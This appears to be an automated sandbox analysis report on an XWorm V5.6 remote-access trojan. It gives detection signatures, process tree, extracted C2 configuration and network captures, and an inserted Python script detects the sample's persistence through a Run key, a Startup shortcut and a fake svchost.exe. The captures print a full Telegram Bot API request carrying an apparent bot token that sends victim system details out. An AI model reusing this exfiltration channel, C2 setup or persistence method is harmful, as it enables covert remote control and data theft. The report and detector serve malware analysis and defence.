

Windows Analysis Report
yF21ypxRB7.exe

Overview

General Information

Sample name: yF21ypxRB7.exe (renamed because the original name is a hash value)
Original sample name: b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71.exe
Analysis ID: 1557207
MD5: 640194b0d51307f362b74fd4a4a1761d
SHA1: 8e623f6ba2c87803f079b85578289359d71c6c90
SHA256: b31d01d8e826ea4773cd7cfdbfca3712287024c03463acb374b5040af27fae71
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • yF21ypxRB7.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\yF21ypxRB7.exe" MD5: 640194B0D51307F362B74FD4A4A1761D)
  • svchost.exe (PID: 1496 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6724 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1424 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7984 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7436 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7584 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 640194B0D51307F362B74FD4A4A1761D)
  • svchost.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 640194B0D51307F362B74FD4A4A1761D)
  • cleanup
{"C2 url": ["perfect-invest.gl.at.ply.gg"], "Port": 61586, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings
yF21ypxRB7.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
yF21ypxRB7.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
yF21ypxRB7.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8421:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x84be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x85d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x80cf:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Roaming\svchost.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\svchost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8421:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x84be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x85d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x80cf:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8221:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x82be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x83d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7ecf:$cnc4: POST / HTTP/1.1
Process Memory Space: yF21ypxRB7.exe PID: 6312 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
Process Memory Space: yF21ypxRB7.exe PID: 6312 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

Source | Rule | Description | Author | Strings
0.0.yF21ypxRB7.exe.470000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.yF21ypxRB7.exe.470000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8421:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x84be:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x85d3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x80cf:$cnc4: POST / HTTP/1.1

                    System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\yF21ypxRB7.exe, ProcessId: 6312, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 7584, ProcessName: svchost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\yF21ypxRB7.exe, ProcessId: 6312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\yF21ypxRB7.exe, ProcessId: 6312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 1496, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-17T19:24:11.934770+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 149.154.167.220 | 443 | TCP
2024-11-17T19:26:29.897915+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49984 | 147.185.221.23 | 61586 | TCP
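The Sigma rows above record the whole persistence chain in four events: the sample writes a copy of itself as svchost.exe into %AppData%, sets a CurrentVersion\Run value pointing at it, drops a .lnk into the per-user Startup folder, and the copy then runs from outside System32. The following is an added example (not Joe Sandbox or Sigma project code) that replays Sysmon-style events through simplified re-implementations of those checks; check_event, triage, Alert and SYSTEM_PROCESS_NAMES are my own names, the process-name list is an assumption shorter than the real rule's, and SAMPLE_EVENTS is constructed from the values shown in the report, including the legitimate System32 svchost.exe launch that must not alert.

```python
"""Replay of the persistence chain recorded in the report against Sysmon-style events.

Added example, not Joe Sandbox or Sigma project code. The checks mirror the Sigma
titles listed under Signatures (Files With System Process Name In Unsuspected
Locations, System File Execution Location Anomaly, CurrentVersion Autorun Keys
Modification, Startup Folder File Write) but are simplified re-implementations,
not the rules themselves. SAMPLE_EVENTS is constructed from the report's values.
"""
import ntpath
from dataclasses import dataclass

# Assumption: a short list of Windows system process names worth checking; the
# real Sigma rule carries a longer one.
SYSTEM_PROCESS_NAMES = {
    "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "smss.exe",
    "wininit.exe", "services.exe", "spoolsv.exe", "explorer.exe",
}
# Directories where those images are expected to live (lower-case, trailing backslash).
LEGIT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
RUN_KEY_MARKERS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
STARTUP_MARKER = "\\microsoft\\windows\\start menu\\programs\\startup\\"


@dataclass(frozen=True)
class Alert:
    title: str
    process_id: int
    detail: str


def _norm(path: str) -> str:
    """Lower-case and use backslashes so prefix and substring checks are stable."""
    return path.replace("/", "\\").lower()


def _system_name_outside_windows(path: str) -> bool:
    """True when the file name is a system process name but the directory is not."""
    p = _norm(path)
    return ntpath.basename(p) in SYSTEM_PROCESS_NAMES and not p.startswith(LEGIT_DIRS)


def check_event(ev: dict) -> list:
    """Return the alerts one Sysmon event triggers (empty list if none)."""
    alerts = []
    eid = ev["EventID"]
    if eid == 1 and _system_name_outside_windows(ev["Image"]):      # process create
        alerts.append(Alert("System File Execution Location Anomaly", ev["ProcessId"], ev["Image"]))
    elif eid == 11:                                                   # file create
        target = ev["TargetFilename"]
        if _system_name_outside_windows(target):
            alerts.append(Alert("Files With System Process Name In Unsuspected Locations",
                                ev["ProcessId"], target))
        if STARTUP_MARKER in _norm(target):
            alerts.append(Alert("Startup Folder File Write", ev["ProcessId"], target))
    elif eid == 13 and ev.get("EventType") == "SetValue":            # registry value set
        if any(marker in _norm(ev["TargetObject"]) for marker in RUN_KEY_MARKERS):
            alerts.append(Alert("CurrentVersion Autorun Keys Modification", ev["ProcessId"],
                                f'{ev["TargetObject"]} = {ev["Details"]}'))
    return alerts


# Constructed from the Sigma rows in the report (not a real Sysmon export).
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\yF21ypxRB7.exe", "ProcessId": 6312,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\svchost.exe"},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Roaming\svchost.exe", "ProcessId": 7584,
     "CommandLine": r'"C:\Users\user\AppData\Roaming\svchost.exe"'},
    {"EventID": 13, "Image": r"C:\Users\user\Desktop\yF21ypxRB7.exe", "ProcessId": 6312,
     "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost",
     "Details": r"C:\Users\user\AppData\Roaming\svchost.exe"},
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\yF21ypxRB7.exe", "ProcessId": 6312,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk"},
    # Legitimate service host launch from System32: must stay silent.
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe", "ProcessId": 1496,
     "CommandLine": r"C:\Windows\System32\svchost.exe -k NetworkService -p"},
]


def triage(events: list) -> list:
    """Run every event through check_event and keep the alerts in event order."""
    return [alert for ev in events for alert in check_event(ev)]


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a.title}] pid={a.process_id} {a.detail}")
```

Run against the five constructed events this yields four alerts, all from PIDs 6312 and 7584, and nothing for the System32 svchost.exe; the directory check is what separates the two, since the file name alone is identical in both cases.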


                    AV Detection

Source: yF21ypxRB7.exe | Avira: detected
Source: perfect-invest.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\svchost.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: yF21ypxRB7.exe | Malware Configuration Extractor: Xworm {"C2 url": ["perfect-invest.gl.at.ply.gg"], "Port": 61586, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 78%
Source: yF21ypxRB7.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\svchost.exe | Joe Sandbox ML: detected
Source: yF21ypxRB7.exe | Joe Sandbox ML: detected
Source: yF21ypxRB7.exe | String decryptor: perfect-invest.gl.at.ply.gg
Source: yF21ypxRB7.exe | String decryptor: 61586
Source: yF21ypxRB7.exe | String decryptor: <123456789>
Source: yF21ypxRB7.exe | String decryptor: <Xwormmm>
Source: yF21ypxRB7.exe | String decryptor: XWorm V5.6
Source: yF21ypxRB7.exe | String decryptor: USB.exe
Source: yF21ypxRB7.exe | String decryptor: %AppData%
Source: yF21ypxRB7.exe | String decryptor: svchost.exe
Source: yF21ypxRB7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: yF21ypxRB7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49978 -> 147.185.221.23:61586
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49984 -> 147.185.221.23:61586
Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49699 -> 149.154.167.220:443
Source: Malware configuration extractor | URLs: perfect-invest.gl.at.ply.gg
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: yF21ypxRB7.exe, type: SAMPLE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.7:49700 -> 147.185.221.23:61586
Source: global traffic | HTTP traffic detected:
    GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 147.185.221.23
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: time.windows.com
Source: global traffic | DNS traffic detected: DNS query: perfect-invest.gl.at.ply.gg
Source: yF21ypxRB7.exe, 00000000.00000002.3701617400.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: svchost.exe, 00000002.00000002.1366625213.0000027E79813000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.comsv
Source: yF21ypxRB7.exe, svchost.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1365942027.0000027E7986E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366768678.0000027E79870000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000002.00000002.1366782396.0000027E79877000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365876022.0000027E79875000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000002.00000003.1366114410.0000027E79859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
Source: svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000002.00000002.1366740763.0000027E79862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366021198.0000027E79861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365861003.0000027E79855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366061020.0000027E7985D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000002.00000003.1264330890.0000027E79836000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000002.00000002.1366755363.0000027E79868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365994412.0000027E79867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000002.00000003.1366141378.0000027E79841000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000002.00000002.1366687714.0000027E79842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366127965.0000027E79848000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000002.00000002.1366644805.0000027E7982B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000002.00000003.1366155081.0000027E79857000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1366713689.0000027E79858000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
